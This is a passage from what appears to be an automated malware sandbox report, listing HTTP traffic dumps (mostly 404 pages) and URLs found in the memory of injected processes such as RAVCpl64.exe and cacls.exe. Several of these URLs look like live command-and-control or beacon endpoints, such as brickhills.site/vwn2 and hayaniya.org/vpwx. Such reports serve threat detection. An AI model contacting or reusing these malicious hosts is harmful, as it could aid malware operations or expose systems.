35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Tue, 03 Dec 2024 13:55:26 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:55:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:55:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:55:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:55:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:56:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:56:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:56:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:56:49 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: cacls.exe, 00000004.00000002.182791208626.00000000058B2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://224466.top
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://dialogpriest.online
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000837E000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000558E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://hayaniya.org/vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.0000000006B2C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000003D3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.179519526215.0000000023C6C000.00000004.80000000.00040000.00000000.sdmp, Pp7OXMFwqhXKx5Y.exeString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.Epicurecooks.world
                Source: RAVCpl64.exe, 00000003.00000002.183789647493.0000000003536000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brickhills.site
                Source: RAVCpl64.exe, 00000003.00000002.183789647493.0000000003536000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brickhills.site/vwn2/
                Source: cacls.exe, 00000004.00000002.182791208626.0000000004DB4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/Epicure_Market_Miami_Beach.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2F
                Source: RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.epicurecooks.world/Epicure_Selections.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2FRk5sF9Bh
